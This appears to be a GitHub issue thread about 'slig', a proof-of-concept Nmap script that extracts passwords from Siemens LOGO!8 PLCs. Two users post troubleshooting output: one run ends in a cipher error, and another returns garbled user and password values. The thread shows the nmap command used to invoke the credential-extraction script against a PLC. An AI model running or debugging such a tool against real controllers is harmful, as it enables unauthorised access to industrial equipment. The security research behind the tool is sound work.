syss-research / slig
Siemens LOGO!8 PLC Password Hacking Proof-of-Concept-Tool
Hello, I've tried that but I'm stuck at SSL: no problem with the private key, I'm stopped before that, when SSL tries to decode the packets from the LOGO.
My environment is Win7 64 Pro, SSL both 32 & 64 bit 1.1.1d and nmap 7.80.
This is the nmap debug output:
```
NSE: Using Lua 5.3.
NSE: Arguments from CLI:
NSE: DEPRECATION WARNING: bin.lua is deprecated. Please use Lua 5.3 string.pack
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
Initiating ARP Ping Scan at 15:36
Scanning 192.168.1.42 [1 port]
Packet capture filter (device eth0): arp and arp[18:4] = 0x183DA25F and arp[22:2] = 0xCA7C
Completed ARP Ping Scan at 15:36, 0.64s elapsed (1 total hosts)
Overall sending rates: 1.57 packets / s, 66.14 bytes / s.
mass_rdns: Using DNS server 192.168.0.1
mass_rdns: Using DNS server 192.168.1.1
mass_rdns: Using DNS server 192.168.0.1
Initiating Parallel DNS resolution of 1 host. at 15:36
mass_rdns: 0.10s 0/1 [#: 3, OK: 0, NX: 0, DR: 0, SF: 0, TR: 1]
Completed Parallel DNS resolution of 1 host. at 15:36, 0.04s elapsed
DNS resolution of 1 IPs took 0.10s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:36
Scanning 192.168.1.42 [1 port]
Packet capture filter (device eth0): dst host 192.168.0.251 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 192.168.1.42)))
Discovered open port 10005/tcp on 192.168.1.42
Completed SYN Stealth Scan at 15:36, 0.01s elapsed (1 total ports)
Overall sending rates: 200.00 packets / s, 8800.00 bytes / s.
NSE: Script scanning 192.168.1.42.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:36
NSE: Starting slig against 192.168.1.42:10005.
00000000 4b 00 09 60 00 00 00 00 00 00 00 00 00 00 00 00 K..`............
00000010 05 60 04 e1 47 fd 91 6a 2e 6f 10 56 f6 1f 16 65 .`..G..j.o.V...e
00000020 f4 a6 7d 76 c0 4a c6 76 89 90 d3 52 67 15 41 bb ..}v.J.v...Rg.A.
00000030 01 42 f4 d0 a6 ea 44 96 55 58 4e fd b5 e9 90 8f .B....D.UXN.....
00000040 9d 9c d2 04 fe f3 12 4e 9a 74 ed d0 d2 4e ab b4 .......N.t...N..
00000050 63 2c e7 96 68 c0 b4 e0 6a 13 63 28 6b 98 46 3a c,..h...j.c(k.F:
00000060 64 1b 9b 21 f1 22 27 c0 91 29 8d d3 30 bc 73 4f d..!."'..)..0.sO
00000070 6e 24 80 0c 8d 92 f2 34 55 58 4e fd b5 e9 90 8f n$.....4UXN.....
00000080 4f b8 c7 ce c5 ce 3b c4 57 fe e9 77 d9 1e d0 7c O.....;.W..w...|
Length: 144 [0x90]
NSE: slig against 192.168.1.42:10005 threw an error!
slig.nse:61: Unknown cipher algorithm: DES-EDE3-ECB
stack traceback:
[C]: in function 'openssl.decrypt'
slig.nse:61: in function slig.nse:34
(...tail calls...)
Completed NSE at 15:36, 0.07s elapsed
Nmap scan report for 192.168.1.42
Host is up, received arp-response (0.0021s latency).
Scanned at 2019-12-08 15:36:09 W. Europe Standard Time for 0s
PORT STATE SERVICE REASON
10005/tcp open stel syn-ack ttl 255
MAC Address: E0:DC:A0:1F:4D:8D (Siemens Industrial Automation Products Chengdu)
Final times for host: srtt: 2125 rttvar: 4000 to: 100000
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
Read from C:\Users\User\Desktop\nmap-7.80: nmap-mac-prefixes nmap-payloads nmap-services.
Nmap done: 1 IP address (1 host up) scanned in 2.71 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
```
My doubt is about the SSL protocol, which seems to be rejected by OpenSSL.
Thanks in advance to all.
This is the output:
```
>nmap --script slig.nse -p 10005 192.168.0.201
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-02 15:40 Mitteleuropõische Zeit
NSOCK ERROR [0.0490s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Nmap scan report for 192.168.0.201
Host is up (0.0048s latency).
PORT STATE SERVICE
10005/tcp open stel
| slig: Gathered Siemens LOGO!8 access details and passwords
| User: xYB
| Password: 20Y
| Enabled: Invalid
| User: ZjzP
| Password: Mt
| Enabled: Invalid
| User: XisD
| Password: 7nHN
| Enabled: Invalid
| User: hgQPB
| Password: RJ
| Enabled: Invalid
| Protection: Invalid
| Program password: gQPgQP
|_MMC serial: _g>\xABQP\xAB\xB6_g>\xABQP\xAB
Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
```
The users and the passwords are strange.
Could it be a problem with the keys?
With these passwords I cannot get access to the LOGO from the software.